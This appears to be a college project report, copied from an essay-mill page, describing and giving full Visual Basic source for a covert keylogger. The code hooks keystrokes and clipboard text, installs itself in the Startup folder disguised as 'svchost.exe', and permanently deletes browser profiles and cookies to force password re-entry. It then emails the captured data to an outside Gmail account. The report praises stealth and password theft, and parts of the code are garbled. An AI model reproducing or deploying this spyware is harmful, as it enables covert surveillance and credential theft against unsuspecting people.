THAKUR COLLEGE OF SCIENCE

THAKUR COLLEGE OF SCIENCE & COMMERCE
THAKUR VILLAGE, KANDIVALI (EAST) MUMBAI
PROJECT REPORT
692150105410On
KEY LOGGER
For
REVOLUTERS FOUNDATION
58 E WING ROOM NO: 1504 EKTA NAGAR MAHADA, KNADIVALI (WEST),MUMBAI, 400067.

Designed & Developed
By
MS. POOJA GUPTA
Bachelor of Science (Computer Science)
45720106680
UNIVERSITY OF MUMBAI
THAKUR COLLEGE OF SCIENCE & COMMERCE
THAKUR VILLAGE, KANDIVALI (EAST) ,MUMBAI
Academic Year 2018-2019

We Will Write a Custom Essay Specifically
For You For Only $13.90/page!


order now

1
Certificate From College
10610851000125Thakur Degree College of Science & Commerce
Shyamnarayan Thakur Marg, Thakur Village
Kandivali (E), Mumbai – 400 101
-22860017780000
DATE:
4782185-889000
COMPUTER DEPARTMENT
(2018-2019)
Certificate of Approval
This is to certify that the project work entitled “KEY – LOGGER” is prepared by MS. POOJA GUPTA, a student of “Third Year Bachelor Of Science (Computer Science)” course of University of Mumbai, which is conducted by our college.

This is the original study work and important sources used have been duly acknowledged in the report. The report is submitted in partial fulfilment of B.SC. (Computer Science) course as per rules of University of Mumbai.401828086550500-14287586423500
Project Guide19805658382000head of department
External Examiner

INDEX
Sr. No Index Topic Page
Acknowledgement I. Preliminary Investigation (i) Description of System (ii) Limitations of present system (iii) Proposed system and its advantages (iv) System Requirements II System Analysis (i) Fact Finding Techniques (ii) Event Table (iii) Use Case Diagram (iv) Activity Diagram (v) Class Diagram (vi) Object Diagram (vii) Sequence Diagram (viii) Entity relationship diagram (ix) Sate chart diagram (iii) System design (i) Component diagram (ii) Deployment diagram (iv) System implementation (i) Code implementation V System Implementation VI Future Enhancement VII References and Bibliography ACKNOWLEDGEMENT
Achievement is finding out what you would be doing rather than what you have to do. It is not until you undertake such a project that you realize how much effort and hard work it really is, what your capabilities are and how well you can present yourself or other things. It tells us how much we rely on the efforts and good will of others. It gives me immense pleasure to present this report towards the fulfillment of my project.

It has been rightly said that we are built on the shoulders of others. For everything I have achieved, the credit goes to all those who had helped me to complete this project successfully.

I take this opportunity to express my profound gratitude to the management of Thakur Degree College of Science & Commerce for giving me this opportunity to accomplish this project work.

I am very much thankful to Dr. C. T. Chakraborty, Principal of Thakur College for their kind co-operation in the completion of my project.

A special vote of thanks to my faculty, Mr.Mahesh Gurunani our project guides and also our HOD Mr. Ashish Trivedi & his most sincere, useful and encouraging contribution throughout the project span.

Finally, I would like to thank all my friends & the entire Computer Science department who directly or indirectly helped me in completion of this project & to my family without whose support, motivation & encouragement this would not have been possible.

(POOJA GUPTA)

Preliminary
Investigation
Organizational Overview
Name: Thakur College Of Science & Commerce
Address: Thakur Village, kandivali (East) Mumbai – 400101
Contacts: 022-2846 2565 / 2887 0627
History
Thakur Junior College was established in 1992, by the founding members, with the notion of providing an avenue of learning within easy reach to the growing young population of kandivali and its vicinity. It was a natural augmentation by the Thakur Educational Trust, for the S.S.C. Pass-out students of the various schools as well as Thakur Vidya Mandir. Thakur College had a humble beginning with only 57 students in FYJC first batch of Commerce stream. Its success led to the commencement of the Junior Science stream and the Degree College in 1997 followed by the Post Graduate section in 2002.

Our college has accomplished a spectacular growth over the last two decades of its journey towards excellence in Education and emerged as a leading Higher Educational Institution in Mumbai. The present total strength of our Degree College Science & Commerce is 7587 and the Junior Section is of 5867 students. The College has consistently attained outstanding results in academics at both Degree & Junior levels.

DESCRIPTION OF SYSTEM
A key logger is a technology that tracks and records consecutive key strokes on a keyboard. Because sensitive information such as usernames and passwords are often entered on a keyboard, a key logger can be a very dangerous technology. Key loggers are often part of malware, spyware or an external virus.

Key loggers are most often used for the purpose of stealing the password and other confidential information.

Not only it can store the key stroke that you type from your laptop or your pc but also it can store all the information of system that you require.

There are many different kinds of key loggers based on diverse key logging methods. These include hardware and software key loggers.

LIMITATION OF PRESENT SYSTEM
1.current system is based on storing the each keys which you type on system and send it to the exact location that sometimes makes a user difficult to understand the meaning of the gathered keys.

2.Most of the time , key logger can be detected by virus scanner and other such apps.

3. A software key logger can send you data or records every time when the victim opens his /her system which means you will be getting records continuously that can be difficult for the person to get the important information.

DISADVANTAGES OF KEY-LOGGER
1.The first issue is legality not all jurisdictions allow for the use of software key loggers whether in the home or the workplace.it is vital that you ensure that using a software key logger is legal in your jurisdiction, and in the event of use in a business ,you really must consult with an HR professional.

2.A second disadvantage relates to the impact upon computer or network performance. anything other than a high quality software key logger will have an impact on computer performance and the experience of the user.

3.As a software key logger is recording every action on the computer ,this will slow down the speed at which the keystrokes or mouse clicks can be executed .

4.There is also the issue of computer crashes and unexpected pc operations which can affect productivity or interfere with normal operation.

5. Many software key loggers will not be able to maintain the processing speed required for a good user experience which means the user cannot see that a software key logger is being used in Keystroke logging, also known as key logging which basically stores the keystrokes from system
the first instance.

PROPOSED SYSTEM
This key logger not only stores the keystrokes from system, but it also stores the other information of the particular pc ,laptop or any other system.

It works on time interval and email ,here you can set the time in second ,in minute or an hour and you can get the information in your email that you have put in your code.

If you don’t want to get the data all the time in your email then put time interval in an hour so that it will only give information in an hour like what activities happened in one hour on that particular system in which you have installed the key logger.

BENEFITS OF KEY-LOGGER
1.Key logger can provide all the important information which you want from anyone’s system.

2.It can be both software key logger or hardware key logger ,software key logger can be helpful for any parents or any organization.

3 .  A good key logger software program will be easy to install and will run in the background, so the user does not even know that the key logging software has even been installed.

4. Using this, the information can directly go to the place where you want to receive your data such as email ,mobile ,etc.

5. Key loggers can be used in your homes to monitor the online activities of your kids or teenagers.

6.You can use a key logger on your personal computer to understand how it actually works and what mistakes you need to avoid in order to prevent yourself from getting into a trap.

7. key loggers are very much used in offices to monitor the activities of the employees. This is basically done to ensure that the employees are using the company’s resources as intended and not doing anything else on pc or system.

SYSTEM REQUIREMENTSHARDWARE REQUIREMENTS
X64 bit Processor
4 GB RAM
221 GB Hard Disk
Coloured Printer
INTERNET
SOFTWARE RESOURCES
Operating system
Windows XP 8
Programming Language
Visual Basic
VISUAL BASIC
Visual Basic (or VB) is a programming language developed by Microsoft that runs on the .Net Framework. With Visual Basic you can build Windows applications, web applications and Windows phone applications. Programs developed in Visual Basic will only run on a Windows Operating System. Visual Basic is easy to learn, fun and powerful! 
Visual Basic has a very simple programming syntax. The language is not case-sensitive and it is designed for people new to the programming world, making it a good place to start. 
Module Module1
Sub Main() End Sub
End Module
Your code goes between the Sub Main() and End Sub. In VB, lines does not end with a semi-colon; compared to C# and most other languages, VB is kept simple!
Comments
Single line comments start with an apostrophe (‘)
There are no block comments in VB
XML comments start with three apostrophes; these are useful for documentation purposes
ADVANTAGES OF VISUAL BASIC
There are many advantages of visual basic
1.The structure of the visual basic programming language is very simple, particularly as to the executable code.

2.Vb is not only a language but also an integrated, interactive development environment(“IDE”).

3.Vb provides a comprehensive interactive and context-sensitive online help system.

4. COM components can be written in different languages and then integrated using Vb5.Vb is a component integration language which is attuned to Microsoft’s Component Object Model (“COM”).

6.There is a wealth of readily available COM components for many different purposes.

7.You can find many tools (Sharewares and Freewares) on the internet that will Spare you some programming time.

8. It’s simple language. Things that may be difficult to program with other language can be done in Visual Basic very easily.

SYSTEM ANALYSIS
FACT FINDING TECHNIQUE
In Thakur college of commerce and science where n no of students take admission every year in various courses.

This application will be useful for teachers to maintain our pc’s or systems from the students or others.

 Keyboard capturing, is the action of recording (logging) the keys ,so that the person using the keyboard is unaware that their actions are being monitored. Data can then be retrieved by the person operating the logging program. 
Keystroke logging is now an established research method for the study of writing processes. Different programs have been developed to collect online process data of writing activities.

Keystroke logging is legitimately used as a suitable research instrument in a number of writing contexts. These include studies on cognitive writing processes, which include
Descriptions of writing strategies; the writing development of children.

First and second language writing, and spelling.

Keystroke logging can be used to research writing, specifically. It can also be integrated in educational domains for second language learning, programming skills, and typing skills.

In our college, Thakur college of commerce and science teachers can also use this application to keep an eye on students.

When system is being used by students, they often try to misuse it , so teacher can install this application on system and they will be able to know that the students are using the particular pc for study purpose only and can make sure they are not misusing it.
EVENT TABLE
EVENT TRIGGER SOURCE RESPONSE ACTIVITY DESTINATION
Get window title Getting window
Title system Captured title Title sent email
Get images Getting images system Captured images
Images sent email
Get videos Getting videos system Captured videos Videos sent email
Get messages Getting messages
system Captured messages Messages sent email
Get password
Getting password system captured password Passwords sent email
Get confidential records Getting records system
Captured records Records sent email
Get sites Getting sites system Captured sites Sites sent email

USE CASE DIAGRAM
5

ACTIVITY DIAGRAM

CLASS DIAGRAM

OBJECT DIAGRAM

SEQUENTIAL DIAGRAM

ENTITY RELATIONSHIP DIAGRAM

STATE CHART DIAGRAM

SYSTEM DESIGN
COMPONENT DIAGRAM

Deployement diagram

SYSTEM IMPLEMENTATION
CODE IMPLEMENTATION
Imports System.IO
Imports System.TextImports System.ComponentModelImports System.Net.MailPublic Class Form1
Dim WithEvents K As New Keyboard
Private Declare Function GetForegroundWindow Lib “user32.dll” () As Int32
Private Declare Function GetWindowText Lib “user32.dll” Alias “GetWindowTextA” (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
Dim strin As String = Nothing
Private Sub KeyboardLanguages() For index = 0 To InputLanguage.InstalledInputLanguages.Count – 1 Step 1
TextBox2.Text = InputLanguage.InstalledInputLanguages.Item(index).LayoutName.ToString + TextBox2.Text
Next
End Sub
Private Function GetActiveWindowTitle() As String
Dim MyStr As String
MyStr = New String(Chr(0), 100)
GetWindowText(GetForegroundWindow, MyStr, 100)
MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) – 1)
Return MyStr End Function
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
If strin ;; GetActiveWindowTitle() Then
TextBox1.Text = TextBox1.Text + vbNewLine + vbNewLine + “” + GetActiveWindowTitle() + “” + vbNewLine + “—>” + Clipboard.GetText.ToString + “<—” + vbNewLine + vbNewLine strin = GetActiveWindowTitle()
End If
End Sub
Private Sub K_Down(ByVal Key As String) Handles K.Down TextBox1.Text ;= Key
End Sub
Private Sub Timer3_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer3.Tick
‘Window startup User Try
Dim file1 As String = Application.ExecutablePath Dim copy1 As String = “C:Users” + Environment.UserName.ToString + “AppDataRoamingMicrosoftStart MenuprogramsStartupsvchost.exe”
If File.Exists(copy1) Then
Else
System.IO.File.Copy(file1, copy1)
End If
Catch ex As Exception
End Try
End Sub
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load KeyboardLanguages() Select Case (My.Settings.browser)
Case 0
My.Settings.browser = 1
My.Settings.Save() My.Settings.Reload() Case 1
Timer4.Start() Case 2
Case Else
End Select
TextBox1.Text = Now() + vbNewLine + vbNewLine Try
Dim myprocess As New Process() myprocess.StartInfo.UseShellExecute = False
myprocess.StartInfo.RedirectStandardOutput = True
Try
myprocess.StartInfo.FileName = “ipconfig”
myprocess.StartInfo.Arguments = “/all”
myprocess.StartInfo.CreateNoWindow = True
myprocess.Start() TextBox1.Text = TextBox1.Text +
Replace(myprocess.StandardOutput.ReadToEnd(),
Chr(13) & Chr(13), Chr(13))
myprocess.WaitForExit() Catch ex As Win32Exception
End Try
Catch ex As Exception
End Try
Try
TextBox1.Text = vbNewLine + vbNewLine + TextBox1.Text + vbNewLine + vbNewLine + “User Name: ” + Environment.UserName.ToString TextBox1.Text = TextBox1.Text + vbNewLine + “Computer name: ” + Environment.MachineName.ToString TextBox1.Text = TextBox1.Text + vbNewLine + “Screen: ” + My.Computer.Screen.WorkingArea.ToString TextBox1.Text = TextBox1.Text + vbNewLine + “OS Version ” + Environment.OSVersion.ToString TextBox1.Text = TextBox1.Text + vbNewLine + “Run Time: ” + Environment.Version.ToString TextBox1.Text = TextBox1.Text + vbNewLine + “System Root: ” + Environment.SystemDirectory.ToString TextBox1.Text = TextBox1.Text + vbNewLine + “User Domain Name: ” + Environment.UserName.ToString TextBox1.Text = TextBox1.Text + vbNewLine + “Total Physical Memory: ” + My.Computer.Info.TotalPhysicalMemory.ToString TextBox1.Text = TextBox1.Text + vbNewLine + “Remain Physical Memory: ” + My.Computer.Info.AvailablePhysicalMemory.ToString K.CreateHook() Timer1.Start() Timer2.Start() Catch ex As Exception
End Try
End Sub
Private Sub Timer4_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer4.Tick
‘ Window
‘ Mozilla deletes folder and .ini file
Try
My.Computer.FileSystem.DeleteDirectory(“C:Users” + Environment.UserName.ToString + “AppDataRoamingMozillaFirefoxProfiles”, FileIO.UIOption.OnlyErrorDialogs, FileIO.RecycleOption.DeletePermanently)
System.IO.File.Delete(“C:Users” + Environment.UserName.ToString + “AppDataRoamingMozillaFirefoxprofile.ini”)
Catch ex As Exception
End Try
‘Chrome deletes folder
Try
My.Computer.FileSystem.DeleteDirectory(“C:Users” + Environment.UserName.ToString + “AppDataLocalGoogleChromeUser Data”, FileIO.UIOption.OnlyErrorDialogs, FileIO.RecycleOption.DeletePermanently)
Catch ex As Exception
End Try
‘IE deletes folder
Try
My.Computer.FileSystem.DeleteDirectory(“C:Users” + Environment.UserName.ToString + “AppDataRoamingMicrosoftWindowsCookies”, FileIO.UIOption.OnlyErrorDialogs, FileIO.RecycleOption.DeletePermanently)
Catch ex As Exception
End Try
‘Opera deletes folder
Try
My.Computer.FileSystem.DeleteDirectory(“C:Users” + Environment.UserName.ToString + “AppDataRoamingOpera”, FileIO.RecycleOption.DeletePermanently)
Catch ex As Exception
End Try
My.Settings.browser = 2
My.Settings.Save() My.Settings.Reload() Timer4.Stop() End Sub
Private Sub Form1_FormClosing(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.FormClosing Try
Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress(“[email protected]”)
MyMailMessage.To.Add(“[email protected]”)
MyMailMessage.Subject = Environment.UserName.ToString + “Turned Off Part: ” + My.Settings.part.ToString MyMailMessage.Body = TextBox1.Text
Dim SMTPServer As New SmtpClient(“smtp.gmail.com”)
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential(“[email protected]”, “[email protected]”)
SMTPServer.EnableSsl = True
SMTPServer.Send(MyMailMessage)
Catch ex As Exception
End Try
My.Settings.part = My.Settings.part + 1
My.Settings.Save() My.Settings.Reload() End Sub
Private Sub Timer2_Tick(sender As Object, e As EventArgs) Handles Timer2.Tick
Try
Timer1.Stop() Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress(“[email protected]”)
MyMailMessage.To.Add(“[email protected]”)
MyMailMessage.Subject = Environment.UserName.ToString + ” Part:” + My.Settings.part.ToString + TextBox2.Text
MyMailMessage.Body = “compare info:” + My.Computer.Info.InstalledUICulture.CompareInfo.ToString + vbNewLine +
“Display Name: ” + My.Computer.Info.InstalledUICulture.DisplayName.ToString + vbNewLine +
“English Name: ” + My.Computer.Info.InstalledUICulture.EnglishName.ToString + vbNewLine +
“Left Language tag: ” + My.Computer.Info.InstalledUICulture.IetfLanguageTag.ToString + vbNewLine +
“Name: ” + My.Computer.Info.InstalledUICulture.Name.ToString + vbNewLine +
“Native Name: ” + My.Computer.Info.InstalledUICulture.NativeName.ToString + vbNewLine +
“Text info: ” + My.Computer.Info.InstalledUICulture.TextInfo.ToString + vbNewLine +
“3 Letter ISO Language Name: ” + My.Computer.Info.InstalledUICulture.ThreeLetterISOLanguageName.ToString + vbNewLine +
“3 Letter Windows language Name: ” + My.Computer.Info.InstalledUICulture.ThreeLetterWindowsLanguageName.ToString + vbNewLine +
“2 Letter ISO Language name: ” + My.Computer.Info.InstalledUICulture.TwoLetterISOLanguageName.ToString + vbNewLine + vbNewLine + vbNewLine + TextBox1.Text
Dim SMTPServer As New SmtpClient(“smtp.gmail.com”)
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential(“[email protected]”, “[email protected]”)
SMTPServer.EnableSsl = True
SMTPServer.Send(MyMailMessage)
TextBox1.Clear() Timer1.Start() Catch ex As Exception
End Try
My.Settings.part = My.Settings.part + 1
My.Settings.Save() My.Settings.Reload() End Sub
End Class
Software Implementation/Uploading
The software made for keystrokes capturing
Before implementing the software the organization’s system must be updated as per the requirement of the system.

The hardware configuration of the organization’s system must constitute of:
X64 bit Processor
4 GB RAM
221 GB Hard Disk
Coloured Printer
The software configuration of the organization’s system must constitute of:
Visual basic
web server
After completing the above process, the software is ready to work with systems.

Future enhancement
Following future enhancement are possible of key logger
1)Nowadays where many crimes are taking place one such example of these crimes can be FACEBOOK ,this software can be used there.
2)Any company or an organization can use the keylogger to keep an eye on employees.

3)Many parents can use this software,in their children’s pc to see what he/she is doing.

4)this software can be used in any school or any college where systems are being used by students.
Refrences And Bibliography
I referred to the following book for documentation for my project:
NAME OF THE BOOK:
1)Learning Visual Basic .Net
2)Programming with Microsoft Visual Basic 2015
INTERNET REFERENCES:
Reference taken from google.Reference taken from You Tube Videos.Reference taken from tutorial points.